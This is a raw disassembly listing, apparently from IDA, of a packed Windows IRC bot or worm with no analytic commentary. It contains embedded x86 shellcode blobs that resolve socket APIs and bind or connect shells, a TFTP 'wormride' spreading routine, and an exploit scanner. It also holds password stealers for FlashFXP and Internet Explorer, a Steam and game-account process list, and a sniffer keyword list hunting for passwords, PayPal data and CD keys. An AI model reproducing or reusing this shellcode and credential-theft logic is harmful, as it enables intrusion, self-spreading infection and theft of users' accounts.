dword_41C724 dd 4000500h, 7868746Bh, 0 ; DATA XREF: sub_411DC5+5E2�o
unk_41C730 db 2Dh ; - ; DATA XREF: sub_411DC5+5BD�o
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
aU_TftpTransfer db '- %u. tftp transfer to %s complete.',0
align 10h
aWormride db 'wormride',0 ; DATA XREF: sub_411DC5+5B8�o
align 4
dword_41C76C dd 1000500h, 656C6946h, 746F4E20h, 756F4620h, 646Eh
; DATA XREF: sub_411DC5+367�o
aOctet db 'octet',0 ; DATA XREF: sub_411DC5+333�o
; sub_411DC5+345�o
align 4
unk_41C788 db 2Dh ; - ; DATA XREF: sub_411DC5+144�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aRunningTftpWor db '- Running TFTP wormride thread',0
aTftpWormrideTh db 'TFTP wormride thread',0 ; DATA XREF: sub_4123F6+2B�o
align 4
loc_41C7C8: ; DATA XREF: sub_4125DF+50�o
jmp short loc_41C7DF
; ---------------------------------------------------------------------------
loc_41C7CA: ; CODE XREF: UPX1:loc_41C7DF�p
mov ecx, 0
xor ecx, 0
pop esi
loc_41C7D6: ; CODE XREF: UPX1:0041C7DB�j
xor byte ptr [ecx+esi-1], 0
loop loc_41C7D6
jmp short near ptr dword_41C7E4
; ---------------------------------------------------------------------------
loc_41C7DF: ; CODE XREF: UPX1:loc_41C7C8�j
call loc_41C7CA
; ---------------------------------------------------------------------------
dword_41C7E4 dd 0 ; CODE XREF: UPX1:0041C7DD�j
dword_41C7E8 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+CB�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 6853h, 2680000h, 8B000000h, 6AD88BD4h, 0BA535210h, 5A603063h
dd 0B450D6FFh, 53555002h, 605800BAh, 0BFD6FFE2h, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C89C dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+8C�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 53EC8B00h, 26A016Ah, 835383BAh, 53D6FF00h
dd 2685353h, 8B000000h, 6AD88BD4h, 0BA535210h, 0C2A69000h
dd 5040D6FFh, 3B7ABA53h, 0D6FFA173h, 0BA535050h, 69D310h
dd 0D88BD6FFh, 0B450C033h, 53555002h, 605800BAh, 0BFD6FFE2h
dd 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41C964 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8788BADh, 45E8h, 8B565300h
; DATA XREF: sub_4124A0+36�o
dd 5C8B3C5Fh, 0DF03783Bh, 205B8B53h, 8353DF03h, 338B04C3h
dd 0C933F703h, 0C1C832ACh, 0C08405C1h, 0CA2BF675h, 2B58E975h
dd 5EEBD1D8h, 3245E03h, 0B8B66DFh, 31C5E8Bh, 8B048BDFh
dd 5B5EC703h, 685EE0FFh, 3233h, 32737768h, 92BA545Fh, 0FF84046Eh
dd 81F88BD6h, 200ECh, 6AEC8B00h, 55544310h, 7232BA53h
dd 0D6FF1979h, 27D8166h, 0ED751111h, 22047D81h, 75222222h
dd 2B450E4h, 0BA535550h, 0E2605800h, 7D81D6FFh, 20EC8300h
dd 0BFEA758Bh, 0
; ---------------------------------------------------------------------------
jmp ebp
; ---------------------------------------------------------------------------
align 4
dword_41CA18 dd 8B20EC83h, 45D89ECh, 81007D89h, 200ECh, 14658900h, 8B64DB33h
; DATA XREF: sub_412720+71�o
dd 408B3043h, 1C708B0Ch, 8788BADh, 0E8087D89h, 45h, 5F8B5653h
dd 3B5C8B3Ch, 53DF0378h, 3205B8Bh, 0C38353DFh, 3338B04h
dd 0ACC933F7h, 0C1C1C832h, 75C08405h, 75CA2BF6h, 0D82B58E9h
dd 35EEBD1h, 0DF03245Eh, 8B0B8B66h, 0DF031C5Eh, 38B048Bh
dd 0FF5B5EC7h, 33685EE0h, 68000032h, 5F327377h, 6E92BA54h
dd 0D6FF8404h, 8B0C4589h, 46A53F8h, 475FF55h, 669000BAh
dd 83D6FFE0h, 850F04F8h, 0C5h, 0E8087D8Bh, 0Dh, 3 dup(0)
dd 18458F00h, 6A026A53h, 68535301h, 0C0000000h, 0BA1875FFh
dd 5C6BD33Dh, 4589D6FFh, 840F401Ch, 8Dh, 330C7D8Bh, 2B450C0h
dd 1475FF50h, 0BA0475FFh, 0E2605800h, 7D8BD6FFh, 74C08508h
dd 41C88B1Eh, 8D535774h, 5051104Dh, 0FF1475FFh, 0B9BA1C75h
dd 0FFCBF5BEh, 74C085D6h, 0FFC5EB40h, 5CBA1C75h, 0FF9DC593h
dd 58446AD6h, 0FC8BE02Bh, 33ABD78Bh, 59106AC0h, 8BFDE2ABh
dd 5252087Dh, 50505050h, 0FF505050h, 2CBA1875h, 0FF2694F1h
dd 0C7FE58D6h, 1BA5053h, 0FFDE34D6h, 1C75FFD6h, 0C5935CBAh
dd 0FFD6FF9Dh, 3DBA1875h, 0FF27CF53h, 0C7D8BD6h, 0BA0475FFh
dd 7315685h, 7D8BD6FFh, 46BABA08h, 0D6FFC10Ch
db 0
byte_41CB95 db 0E3h ; DATA XREF: sub_4125DF+CF�r
; sub_4125DF+E4�w
align 4
dword_41CB98 dd 4113E68Bh ; DATA XREF: sub_4125DF+60�r
; sub_4125DF+75�w
align 10h
off_41CBA0 dd offset dword_41CCF8 ; DATA XREF: sub_4127D0+77�r
dd offset nullsub_4
dd 0
dd offset dword_41CCD8
dd offset dword_41CCCC
align 8
dd offset dword_41CCAC
dd offset nullsub_102
dd 0
dd offset dword_41CC84
dd offset nullsub_103
align 10h
dd offset loc_41CC58
dd offset dword_41CC4C
dd 0
dd offset dword_41CC34
dd offset nullsub_104
align 8
dd offset loc_41CC0C
dd offset nullsub_105
dd 4 dup(0)
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_105. PRESS KEYPAD "+" TO EXPAND]
db 0DAh
dd 2 dup(0)
; ---------------------------------------------------------------------------
loc_41CC0C: ; DATA XREF: UPX1:0041CBE8�o
; UPX1:0041DB60�o
mov ah, [esi-42447F50h]
mov esp, 0C590B1ACh
cdq
icebp
mov edi, 0B191C99Ah
test dword ptr [esi+0A0ADh], 0
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_104. PRESS KEYPAD "+" TO EXPAND]
db 0D0h
dd 2 dup(0)
dword_41CC34 dd 91B0A391h, 0A1B1FABBh, 9EDF93AAh, 88DAB2E5h, 0B4AD9Ah
; DATA XREF: UPX1:0041CBDC�o
; UPX1:0041DB54�o
dd 0
dword_41CC4C dd 0DBEFF5CEh, 2 dup(0) ; DATA XREF: UPX1:0041CBD4�o
; UPX1:0041DB4C�o
; ---------------------------------------------------------------------------
loc_41CC58: ; DATA XREF: UPX1:0041CBD0�o
; UPX1:0041DB48�o
xchg eax, esp
mov ebx, 0FAA489A9h
mov eax, ds:0DA97B2BAh
retn 0A4A4h
; ---------------------------------------------------------------------------
dw 0D386h
dd 84B8B28Bh, 0E6BCA1A0h, 0DB99A1h, 0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_103. PRESS KEYPAD "+" TO EXPAND]
db 0F0h, 0E0h, 0DBh
dd 2 dup(0)
dword_41CC84 dd 87BEA397h, 0A9BAFAA7h, 9FC29FA5h, 0C381BEE5h, 0C6ACB590h
; DATA XREF: UPX1:0041CBC4�o
; UPX1:0041DB3C�o
dd 0A0B1A6h, 0
; [00000003 BYTES: COLLAPSED FUNCTION nullsub_102. PRESS KEYPAD "+" TO EXPAND]
db 0D0h
dd 2 dup(0)
dword_41CCAC dd 8DBEAB8Eh, 0A4B6FABAh, 82DD95A3h, 0D581B2FEh, 9BBAA69Bh
; DATA XREF: UPX1:0041CBB8�o
; UPX1:0041DB30�o
dd 0A5BBB7E6h, 2 dup(0)
dword_41CCCC dd 0D0EBFBC0h, 2 dup(0) ; DATA XREF: UPX1:0041CBB0�o
; UPX1:0041DB28�o
dword_41CCD8 dd 0C6B0A38Dh, 0A0A7BCA1h, 0D88E92B1h, 84B8F4h, 0
; DATA XREF: UPX1:0041CBAC�o
; UPX1:0041DB24�o
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_4. PRESS KEYPAD "+" TO EXPAND]
db 0F0h, 0EAh, 0DCh
dd 2 dup(0)
dword_41CCF8 dd 90AAAB8Ah, 0A6B1B1BCh, 9EDF99ECh, 0C281A2F3h, 8DB7EC9Dh
; DATA XREF: UPX1:off_41CBA0�o
; UPX1:off_41DB18�o
dd 0BCh, 0
dword_41CD14 dd 72h ; DATA XREF: sub_412A3A:loc_412B93�o
dword_41CD18 dd 62h ; DATA XREF: sub_412BC9:loc_412D11�o
dword_41CD1C dd 63h ; DATA XREF: sub_412D56:loc_412DC8�o
dword_41CD20 dd 3430032Dh, 3752502h, 52202D02h, 696E6E75h, 7320676Eh
; DATA XREF: sub_412E04+64�o
dd 6C6C6568h, 65646F63h, 72657320h, 20726576h, 70206E6Fh
dd 2074726Fh, 2343003h, 2037325h, 0
dword_41CD58 dd 6C656853h, 646F636Ch, 65732065h, 72657672h, 206E6F20h
; DATA XREF: sub_412F07+98�o
dd 74726F70h, 34300320h, 3752502h, 2, 0
byte_41CD80 db 9Dh ; DATA XREF: sub_41294E+3C�o
; sub_41294E+4C�o ...
db 0A1h, 0B6h, 85h
dd 0FAh, 2 dup(0)
dd 0C8000000h, 0ECF1h, 3 dup(0)
db 2 dup(0)
dword_41CDA6 dd 9BB7E8F6h ; DATA XREF: sub_41294E+2B�r
; sub_412FC6+31�r ...
dword_41CDAA dd 0 ; DATA XREF: sub_412FC6+57�w
; sub_414052+B5�r ...
off_41CDAE dd offset sub_410649 ; DATA XREF: sub_41294E+1C�r
; sub_412FC6+18�r ...
dw 3
dd 0
dd 0A7970000h, 0A0A998ADh, 0BCh, 2 dup(0)
dd 0ECF6CD00h, 4 dup(0)
dd 0E0F98ECFh, 0
dd offset sub_410B52
dd 3, 10h dup(0)
dword_41CE30 dd 6E695728h, 293233h ; DATA XREF: sub_41308F+217�o
dword_41CE38 dd 696E5528h, 2978h ; DATA XREF: sub_41308F+1F1�o
dword_41CE40 dd 63617041h, 252F6568h, 75h ; DATA XREF: sub_41308F+1DF�o
aApache db 'Apache',0 ; DATA XREF: sub_41308F+1B9�o
align 4
aMicrosoftIisU_ db 'Microsoft-IIS/%u.%u',0 ; DATA XREF: sub_41308F+130�o
aMicrosoftIis db 'Microsoft-IIS',0 ; DATA XREF: sub_41308F+FC�o
align 4
aServer db 'Server:',0 ; DATA XREF: sub_41308F+7A�o
aOptionsHttp1_0 db 'OPTIONS / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41308F+B�o
db 0Dh,0Ah,0
align 4
unk_41CE98 db 53h ; S ; DATA XREF: sub_41349C+5E4�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 3
db 30h, 34h, 2
db 25h ; %
db 73h, 3, 2
db 3Ah ; :
db 25h, 73h, 20h
db 69h ; i
db 6Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 30h ; 0
db 2Eh, 32h, 66h
db 3
db 2, 73h, 65h
db 63h ; c
db 2Eh, 20h, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aOpenIpSFound db 'open IP(s) found',0
align 4
dword_41CEDC dd 2343003h, 2037325h, 2073253Ah, 6F207369h, 6E6570h
; DATA XREF: sub_41349C+55E�o
dword_41CEF0 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_41349C+343�o
dd 2343003h, 2037325h, 2073253Ah, 20726F66h, 2343003h
dd 2037525h, 63657320h, 28646E6Fh, 2973h
dword_41CF28 dd 6E616353h, 676E696Eh, 34300320h, 3732502h, 73253A02h
; DATA XREF: sub_41349C+305�o
dd 726F6620h, 34300320h, 3752502h, 65732002h, 646E6F63h
dd 297328h
unk_41CF54 db 53h ; S ; DATA XREF: sub_413AB0+1DC�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 69h, 6Eh, 67h
db 20h
db 3, 30h, 34h
db 2
db 25h, 73h, 3
db 2
db 3Ah, 25h, 73h
db 20h
db 66h, 6Fh, 72h
db 20h
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aSecondSTUSU db ' second(s), t:%u s:%u',0
align 4
dword_41CF8C dd 3430032Dh, 3752502h, 41202D02h, 6D657474h, 64657470h
; DATA XREF: sub_413CB3+30E�o
dd 34300320h, 3752502h, 78652002h, 696F6C70h, 69746174h
dd 73286E6Fh, 6E6F2029h, 34300320h, 3752502h, 50492002h
dd 2E297328h, 0
dword_41CFD0 dd 65747441h, 6974706Dh, 7420676Eh, 7865206Fh, 696F6C70h
; DATA XREF: sub_413CB3+2B0�o
dd 30032074h, 73250234h, 77200203h, 20687469h, 2343003h
dd 2037325h, 2E2E2Eh
unk_41D000 db 2Dh ; - ; DATA XREF: sub_413CB3+31�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aAttemptingTo_0 db '- Attempting to exploit IP',27h,'s in list.',0
align 10h
aAttemptingToEx db 'Attempting to exploit IP',27h,'s in list.',0 ; DATA XREF: sub_413FE7+52�o
dword_41D054 dd 3003203Ah, 75250234h, 202E0203h, 0 ; DATA XREF: sub_414052+BB�o
aExploitStatist db 'Exploit statistics - ',0 ; DATA XREF: sub_414052+29�o
align 4
aListingExploit db 'Listing exploit statistics',0 ; DATA XREF: sub_41417D+2B�o
align 4
dword_41D098 dd 62616E55h, 7420656Ch, 6F63206Fh, 63656E6Eh, 6F742074h
; DATA XREF: sub_4141C1+D8�o
dd 34300320h, 3732502h, 6F702002h, 3207472h, 25023430h
dd 2E020373h, 0
dword_41D0C8 dd 656D6954h, 2074756Fh, 7563636Fh, 20646572h, 6C696877h
; DATA XREF: sub_4141C1+B4�o
dd 6F632065h, 63656E6Eh, 676E6974h, 206F7420h, 2343003h
dd 2037325h, 3430033Ah, 3732502h, 202E02h
dword_41D100 dd 6E6E6F43h, 65746365h, 6F742064h, 34300320h, 3732502h
; DATA XREF: sub_4141C1+78�o
dd 30033A02h, 73250234h, 69200203h, 3003206Eh, 75250234h
dd 203736Dh, 2Eh
dword_41D130 dd 6E6E6F43h, 69746365h, 7420676Eh, 7325206Fh, 726F7020h
; DATA XREF: sub_4142BF+D8�o
dd 30032074h, 73250234h, 203h
unk_41D150 db 53h ; S ; DATA XREF: sub_4143B0+221�o
db 63h, 61h, 6Eh
db 6Eh ; n
db 65h, 64h, 20h
db 25h ; %
db 73h, 20h, 69h
db 6Eh ; n
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 30h
db 2Eh ; .
db 32h, 66h, 3
db 2
db 73h, 65h, 63h
db 2Eh ; .
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 6Fh
aPenPortSFound db 'pen port(s) found',0
align 4
dword_41D18C dd 33A7325h, 25023430h, 20020373h, 6F207369h, 6E6570h
; DATA XREF: sub_4143B0+1BA�o
dword_41D1A0 dd 3430032Dh, 3752502h, 53202D02h, 6E6E6163h, 20676E69h
; DATA XREF: sub_4143B0+81�o
dd 70207325h, 2074726Fh, 2343003h, 2037525h, 3430032Dh
dd 3752502h, 69772002h, 3206874h, 25023430h, 20020375h
dd 6B636F73h, 73287465h, 29h
dword_41D1E8 dd 6E616353h, 676E696Eh, 20732520h, 74726F70h, 34300320h
; DATA XREF: sub_414600+1BE�o
dd 3752502h, 30032D02h, 75250234h, 77200203h, 20687469h
dd 2343003h, 2037525h, 636F7320h, 2874656Bh, 2973h
aYa36za48dehfrv db 'yA36zA48dEhfrvghGRg57h5UlDv3',0 ; DATA XREF: sub_4147E5+6�o
; sub_4147E5+C6�o
align 4
aSflashfxpSites db '%sFlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+107�o
align 4
aFlashfxpSites_ db '\FlashFXP\sites.dat',0 ; DATA XREF: sub_4148CE+B6�o
aProgramfiles db 'ProgramFiles',0 ; DATA XREF: sub_4148CE+AB�o
align 10h
aSites_dat db 'sites.dat',0 ; DATA XREF: sub_4148CE:loc_414945�o
align 4
aFlashfxp_exe1 db 'FlashFXP.exe %1',0 ; DATA XREF: sub_4148CE+57�o
aSoftwareClasse db 'SOFTWARE\Classes\Applications\FlashFXP.exe\shell\open\command',0
; DATA XREF: sub_4148CE+15�o
align 4
unk_41D2DC db 2Dh ; - ; DATA XREF: sub_414A1E+464�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 2Fh, 3
db 30h ; 0
db 34h, 2, 25h
db 75h ; u
db 3, 2, 20h
aFlashfxpPass_0 db 'FlashFXP password(s).',0
align 4
dword_41D318 dd 2343003h, 2037525h ; DATA XREF: sub_414A1E+3C4�o
a_FlashfxpFtpSS db '. FlashFXP - ftp://%s:%s@%s:%s - %s',0
aPass127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+352�o
db 'Pass=%127s',0Dh,0Ah,0
align 4
aUser127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+338�o
db 'User=%127s',0Dh,0Ah,0
align 4
aPort127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+31E�o
db 'Port=%127s',0Dh,0Ah,0
align 4
aIp127s db 0Dh,0Ah ; DATA XREF: sub_414A1E+304�o
db 'IP=%127s',0Dh,0Ah,0
align 4
asc_41D384 db '[%[^]]]',0Dh,0Ah,0 ; DATA XREF: sub_414A1E+2EA�o
align 10h
aPass_0 db 0Dh,0Ah ; DATA XREF: sub_414A1E+1F4�o
db 'Pass=',0
aUser_0 db 0Dh,0Ah ; DATA XREF: sub_414A1E+1DC�o
db 'User=',0
aPort db 0Dh,0Ah ; DATA XREF: sub_414A1E+1C4�o
db 'Port=',0
aIp db 0Dh,0Ah ; DATA XREF: sub_414A1E+1AC�o
db 'IP=',0
align 10h
asc_41D3B0 db 0Dh,0Ah ; DATA XREF: sub_414A1E:loc_414BA6�o
db 0Dh,0Ah
db '[',0
align 4
unk_41D3B8 db 2Dh ; - ; DATA XREF: sub_414A1E+55�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingFlashfx db '- Listing FlashFXP passwords',0
align 10h
aFlashfxpPasswo db 'FlashFXP password stealer',0 ; DATA XREF: sub_414EB0+2B�o
align 4
unk_41D3FC db 2Dh ; - ; DATA XREF: sub_414EF4+B8A�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
db 2Dh, 20h, 4Ch
db 69h ; i
db 73h, 74h, 65h
db 64h ; d
db 20h, 3, 30h
db 34h ; 4
db 2, 25h, 75h
db 3
db 2, 20h, 69h
aNternetExplore db 'nternet explorer password(s).',0
align 4
dword_41D438 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6D6F436Fh
; DATA XREF: sub_414EF4+AD8�o
dd 74656C70h, 61502065h, 6F777373h, 20736472h, 6953202Dh
dd 203A6574h, 2343003h, 2037325h, 614E202Eh, 203A656Dh
dd 2343003h, 2037325h, 6150202Eh, 6F777373h, 203A6472h
dd 2343003h, 2037325h, 2Eh
dword_41D494 dd 2343003h, 2037525h, 4549202Eh, 7475413Ah, 6F43206Fh
; DATA XREF: sub_414EF4+A2B�o
dd 656C706Dh, 66206574h, 646C6569h, 202D2073h, 6C656946h
dd 3203A64h, 25023430h, 2E020373h, 74614420h, 3203A61h
dd 25023430h, 2E020373h, 0
dword_41D4DC dd 70747468h, 2F3A73h ; DATA XREF: sub_414EF4+9DD�o
dword_41D4E4 dd 70747468h, 2F3Ah ; DATA XREF: sub_414EF4+9C6�o
dword_41D4EC dd 7274533Ah, 676E69h ; DATA XREF: sub_414EF4+983�o
; sub_414EF4+99A�o
aStringindex db 'StringIndex',0 ; DATA XREF: sub_414EF4+968�o
aE161255a db 'e161255a',0 ; DATA XREF: sub_414EF4:loc_415842�o
align 4
dword_41D50C dd 2343003h, 2037525h, 534D202Eh, 7845204Eh, 726F6C70h
; DATA XREF: sub_414EF4+935�o
dd 2D207265h, 4E534D20h, 3A444920h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
dword_41D54C dd 2Ch ; DATA XREF: sub_414EF4+83B�o
; sub_414EF4+852�o ...
aB9819c52 db 'b9819c52',0 ; DATA XREF: sub_414EF4:loc_4155CE�o
align 4
dword_41D55C dd 2343003h, 2037525h, 4549202Eh, 7361503Ah, 726F7773h
; DATA XREF: sub_414EF4+6C6�o
dd 72502D64h, 6365746Fh, 20646574h, 6953202Dh, 203A6574h
dd 2343003h, 2037325h, 614E202Eh, 203A656Dh, 2343003h
dd 2037325h, 6150202Eh, 6F777373h, 203A6472h, 2343003h
dd 2037325h, 2Eh
a5e7e8100 db '5e7e8100',0 ; DATA XREF: sub_414EF4:loc_41550C�o
align 10h
dword_41D5C0 dd 2343003h, 2037525h, 754F202Eh, 6F6F6C74h, 7078456Bh
; DATA XREF: sub_414EF4+604�o
dd 73736572h, 4E202D20h, 3A656D61h, 34300320h, 3732502h
dd 50202E02h, 77737361h, 3A64726Fh, 34300320h, 3732502h
dd 2E02h
a220d5cc1 db '220d5cc1',0 ; DATA XREF: sub_414EF4+5C2�o
align 4
aWs db '%ws',0 ; DATA XREF: sub_414EF4+41C�o
asc_41D610 db '%x',0 ; DATA XREF: sub_414EF4+234�o
align 4
unk_41D614 db 2Dh ; - ; DATA XREF: sub_414EF4+1A9�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
aListingInterne db '- Listing internet explorer passwords',0
align 8
dword_41D648 dd 5A6F1EC0h, 11D02DB1h, 0C000398Ch, 6B12D94Fh ; DATA XREF: sub_414EF4+123�o
; sub_414EF4+2C7�o ...
aInternetExplor db 'Internet explorer password stealer',0 ; DATA XREF: sub_415AF0+36�o
align 4
dword_41D67C dd 65746E49h, 74736572h, 20676E69h, 636F7270h, 65737365h
; DATA XREF: sub_415B60+277�o
dd 202D2073h, 75736956h, 43206C61h, 36202B2Bh, 3003203Ah
dd 73250234h, 202E0203h, 65726E55h, 52496C61h, 203A4443h
dd 2343003h, 2037325h, 7453202Eh, 3A6D6165h, 34300320h
dd 3732502h, 57202E02h, 646C726Fh, 20664F20h, 63726157h
dd 74666172h, 3003203Ah, 73250234h, 202E0203h, 716E6F43h
dd 20726575h, 696C6E4Fh, 203A656Eh, 2343003h, 2037325h
dd 2Eh
aSoftwareValveS db 'Software\Valve\Steam',0 ; DATA XREF: sub_415B60+149�o
align 4
aSoftwareMicr_0 db 'SOFTWARE\Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++',0
; DATA XREF: sub_415B60+10A�o
align 4
aConquer db '[Conquer]',0 ; DATA XREF: sub_415B60:loc_415C2F�o
align 10h
aWorldOfWarcraf db 'World Of Warcraft',0 ; DATA XREF: sub_415B60:loc_415C0E�o
align 4
aUnreal3 db 'Unreal3',0 ; DATA XREF: sub_415B60+8C�o
aListingInteres db 'Listing interesting processes',0 ; DATA XREF: sub_415DFD+2B�o
align 4
off_41D7AC dd offset aUser_1 ; DATA XREF: sub_415EB7+32�o
; "user "
dd offset aUnknown_1 ; "unknown "
dd offset aPass_2 ; "pass "
dd offset aMailpass ; "MailPass "
dd offset aOper ; "oper "
dd 0
dd offset aIdentify ; "identify "
dd 0
dd offset aAuth_0 ; " :auth "
dd 0
dd offset aPasswd_0 ; "passwd="
dd 0
dd offset aUsername_0 ; "username="
dd 0
dd offset aPassword_0 ; "password="
dd 0
dd offset aLogin_1 ; "login="
dd 0
dd offset aPass_1 ; "pass="
dd 0
dd offset aPw ; "pw="
dd 2 dup(0)
off_41D808 dd offset aLogin_0 ; DATA XREF: sub_415EB7+54�o
; "login "
align 10h
dd offset aSxt ; "sxt "
align 8
dd offset aAuth ; "auth "
align 10h
dd offset aPasswort ; "passwort "
align 8
dd offset aCdkey ; "cdkey"
align 10h
dd offset aCdKey_0 ; "cd-key"
align 8
dd offset aCdKey ; "cd key"
align 10h
dd offset aPassword ; "password"
align 8
dd offset aPaypal_com ; "paypal.com"
dd 0
dd offset aPaypal ; "paypal"
align 8
dd offset aIrcOperator ; "irc operator"
align 10h
dd offset aLP ; "l/p"
align 8
dd offset aSsh1_5 ; "SSH-1.5"
align 10h
dd offset aSsh1_99 ; "SSH-1.99"
dd 2 dup(0)
off_41D87C dd offset aSetCookie ; DATA XREF: sub_415EB7+76�o
; "Set-Cookie:"
dd 0
dd offset aSyn ; "syn"
dd 0
dd offset aFlood ; "flood "
dd 0
dd offset aClone ; "clone "
dd 0
dd offset aServU_0 ; "serv-u"
dd 0
dd offset aServU ; "serv u"
dd 0
dd offset aServu ; "servu"
dd 0
dd offset aDdos ; "ddos"
align 10h
off_41D8C0 dd offset dword_41D91C ; DATA XREF: sub_415EB7+98�o
align 8
dd offset dword_41D914
align 10h
dd offset dword_41D90C
align 8
dd offset dword_41D904
align 10h
dd offset dword_41D8FC
align 8
dd offset dword_41D8F4
dd 2 dup(0)
dword_41D8F4 dd 54495551h, 20h ; DATA XREF: UPX1:0041D8E8�o
dword_41D8FC dd 54524150h, 20h ; DATA XREF: UPX1:0041D8E0�o
dword_41D904 dd 4E494F4Ah, 20h ; DATA XREF: UPX1:0041D8D8�o
dword_41D90C dd 49504F54h, 2043h ; DATA XREF: UPX1:0041D8D0�o
dword_41D914 dd 49544F4Eh, 204543h ; DATA XREF: UPX1:0041D8C8�o
dword_41D91C dd 56495250h, 2047534Dh, 0 ; DATA XREF: UPX1:off_41D8C0�o
aDdos db 'ddos',0 ; DATA XREF: UPX1:0041D8B4�o
align 10h
aServu db 'servu',0 ; DATA XREF: UPX1:0041D8AC�o
align 4
aServU db 'serv u',0 ; DATA XREF: UPX1:0041D8A4�o
align 10h
aServU_0 db 'serv-u',0 ; DATA XREF: UPX1:0041D89C�o
align 4
aClone db 'clone ',0 ; DATA XREF: UPX1:0041D894�o
align 10h
aFlood db 'flood ',0 ; DATA XREF: UPX1:0041D88C�o
align 4
aSyn db 'syn',0 ; DATA XREF: UPX1:0041D884�o
aSetCookie db 'Set-Cookie:',0 ; DATA XREF: UPX1:off_41D87C�o
aSsh1_99 db 'SSH-1.99',0 ; DATA XREF: UPX1:0041D870�o
align 4
aSsh1_5 db 'SSH-1.5',0 ; DATA XREF: UPX1:0041D868�o
aLP db 'l/p',0 ; DATA XREF: UPX1:0041D860�o
aIrcOperator db 'irc operator',0 ; DATA XREF: UPX1:0041D858�o
align 10h
aPaypal db 'paypal',0 ; DATA XREF: UPX1:0041D850�o
align 4
aPaypal_com db 'paypal.com',0 ; DATA XREF: UPX1:0041D848�o
align 4
aCdKey db 'cd key',0 ; DATA XREF: UPX1:0041D838�o
align 4
aCdKey_0 db 'cd-key',0 ; DATA XREF: UPX1:0041D830�o
align 4
aCdkey db 'cdkey',0 ; DATA XREF: UPX1:0041D828�o
align 4
aPasswort db 'passwort ',0 ; DATA XREF: UPX1:0041D820�o
align 4
aAuth db 'auth ',0 ; DATA XREF: UPX1:0041D818�o
align 10h
aSxt db 'sxt ',0 ; DATA XREF: UPX1:0041D810�o
align 4
aLogin_0 db 'login ',0 ; DATA XREF: UPX1:off_41D808�o
align 10h
aPw db 'pw=',0 ; DATA XREF: UPX1:0041D7FC�o
aPass_1 db 'pass=',0 ; DATA XREF: UPX1:0041D7F4�o
align 4
aLogin_1 db 'login=',0 ; DATA XREF: UPX1:0041D7EC�o
align 4
aPassword_0 db 'password=',0 ; DATA XREF: UPX1:0041D7E4�o
align 10h
aUsername_0 db 'username=',0 ; DATA XREF: UPX1:0041D7DC�o
align 4
aPasswd_0 db 'passwd=',0 ; DATA XREF: UPX1:0041D7D4�o
aAuth_0 db ' :auth ',0 ; DATA XREF: UPX1:0041D7CC�o
aIdentify db 'identify ',0 ; DATA XREF: UPX1:0041D7C4�o
align 4
aOper db 'oper ',0 ; DATA XREF: UPX1:0041D7BC�o
align 10h
aMailpass db 'MailPass ',0 ; DATA XREF: UPX1:0041D7B8�o
align 4
aPass_2 db 'pass ',0 ; DATA XREF: UPX1:0041D7B4�o
align 4
aUnknown_1 db 'unknown ',0 ; DATA XREF: UPX1:0041D7B0�o
align 10h
aUser_1 db 'user ',0 ; DATA XREF: UPX1:off_41D7AC�o
align 4
dword_41DA58 dd 70737553h, 6F696369h, 70207375h, 656B6361h, 72662074h
; DATA XREF: sub_415F69+5CE�o
dd 3206D6Fh, 25023430h, 3A020373h, 2343003h, 2037525h
dd 73253E2Dh, 2075253Ah, 0
unk_41DA8C db 2Dh ; - ; DATA XREF: sub_415F69+1A6�o
db 3, 30h, 34h
db 2
db 25h, 75h, 3
db 2
